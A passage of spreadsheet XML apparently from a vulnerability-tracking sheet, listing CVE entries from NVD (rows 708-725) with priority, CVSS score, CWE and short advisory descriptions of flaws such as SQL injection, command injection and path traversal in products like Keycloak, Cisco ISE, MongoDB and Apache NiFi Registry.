          <t>A vulnerability was detected in SourceCodester Inventory and Monitoring System 1.0. The impacted element is an unknown function of the file /admins/assessments/databank/btn_functions.php?action=add. Performing a manipulation of the argument difficulty_id results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92406</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92718</t>
        </is>
      </c>
      <c r="D709" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr"/>
      <c r="Q709" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R709" s="5" t="inlineStr">
        <is>
          <t>Nuclei versions before 3.11.1 cache template signature verification based only on file modification time without content checksums. Attackers can replace verified templates with unsigned malicious content and restore the original modification time to bypass signature checks and execute arbitrary operating system commands.</t>
        </is>
      </c>
      <c r="S709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92718</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17526</t>
        </is>
      </c>
      <c r="D710" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F710" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr"/>
      <c r="Q710" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R710" s="5" t="inlineStr">
        <is>
          <t>Keycloak is an open-source identity and access management solution. A vulnerability was discovered where a user with the impersonation role can impersonate a realm administrator. This allows the attacker to gain full administrative control over the realm, including the ability to manage users, clients, and roles.</t>
        </is>
      </c>
      <c r="S710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17526</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18595</t>
        </is>
      </c>
      <c r="D711" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F711" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr"/>
      <c r="Q711" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R711" s="5" t="inlineStr">
        <is>
          <t>The WP-Lister Lite for eBay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via AJAX Cron Handler Request Parameter in all versions up to, and including, 3.8.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18595</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27560</t>
        </is>
      </c>
      <c r="D712" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F712" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr"/>
      <c r="Q712" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R712" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/status/data endpoint by sending a crafted DELETE request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27560</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27561</t>
        </is>
      </c>
      <c r="D713" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F713" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr"/>
      <c r="Q713" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R713" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/iodd/config endpoint by sending a crafted GET request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27561</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27562</t>
        </is>
      </c>
      <c r="D714" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F714" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr"/>
      <c r="Q714" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R714" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/iodd/config endpoint by sending a crafted PUT request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27562</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27563</t>
        </is>
      </c>
      <c r="D715" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr"/>
      <c r="Q715" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R715" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/datastorage/data endpoint by sending a crafted GET request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27563</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27564</t>
        </is>
      </c>
      <c r="D716" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F716" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr"/>
      <c r="Q716" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R716" s="5" t="inlineStr">
        <is>
          <t>A high-privileged remote attacker can exploit a command injection vulnerability in the /api/datastorage/data endpoint by sending a PUT request with admin credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27564</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76424</t>
        </is>
      </c>
      <c r="D717" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F717" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr"/>
      <c r="Q717" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R717" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE could allow an authenticated, remote attacker to upload or copy arbitrary files on an affected device.
This vulnerability is due to insufficient validation in file operations. An attacker could exploit this vulnerability by uploading a file with a crafted path. A successful exploit could allow the attacker to upload files to arbitrary locations and execute arbitrary commands as root on the affected device.&amp;nbsp;To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76424</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80127</t>
        </is>
      </c>
      <c r="D718" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F718" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr"/>
      <c r="Q718" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R718" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="S718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80127</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81468</t>
        </is>
      </c>
      <c r="D719" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="n">
        <v>0.023</v>
      </c>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr"/>
      <c r="Q719" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R719" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10. 2616, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution.</t>
        </is>
      </c>
      <c r="S719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81468</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="D720" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F720" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K720" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr"/>
      <c r="Q720" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R720" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue exists in the server's query execution memory tracking subsystem. An authenticated user with read privileges can trigger a write to freed heap memory through a sequence of standard database commands, leading to server process crash or potential memory corruption. No user interaction is required.</t>
        </is>
      </c>
      <c r="S720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="D721" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F721" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K721" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr"/>
      <c r="Q721" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R721" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of storage engine configuration options in MongoDB Server allows an authenticated user with write privileges to supply crafted parameters during collection creation that override internal storage metadata. This results in an out-of-bounds memory write in the server process, causing a denial of service via server crash, with potential for further impact including arbitrary code execution.</t>
        </is>
      </c>
      <c r="S721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87021</t>
        </is>
      </c>
      <c r="D722" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F722" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr"/>
      <c r="Q722" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R722" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87021</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87024</t>
        </is>
      </c>
      <c r="D723" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F723" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr"/>
      <c r="Q723" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R723" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Asset.</t>
        </is>
      </c>
      <c r="S723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87024</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87976</t>
        </is>
      </c>
      <c r="D724" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F724" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr"/>
      <c r="Q724" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R724" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi Registry 0.4.0 through 2.11.0 are subject to path manipulation when storing extension bundle content using group, artifact, and version coordinates from uploaded NAR manifests. The default file persistence provider used coordinates as filesystem path components without rejected parent-directory names, and the path-containment check compared an unnormalized resolved path. An authenticated user authorized to write and delete bundles in a bucket can upload a NAR with a crafted manifest resulting in file system operations outside of the file persistence directory. Upgrading to Apache NiFi Registry 2.12.0 is the recommended mitigation, which rejects parent-directory coordinates and requires a normalized path to remain a strict child of the storage root location.</t>
        </is>
      </c>
      <c r="S724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87976</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92469</t>
        </is>
      </c>
      <c r="D725" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F725" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr"/>
      <c r="Q725" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R725" s="5" t="inlineStr">
        <is>
          <t>zlt2000 microservices-platform through 6.0.0 contains an authorization bypass vulnerability in the file-center module DELETE /files/{id} endpoint that performs no ownership validation. Authenticated attackers can enumerate file identifiers via GET /files and delete arbitrary users' files and metadata by supplying their identifiers to the delete endpoint.</t>
        </is>
      </c>
      <c r="S725" s="6" t="inlineStr">
        <is>
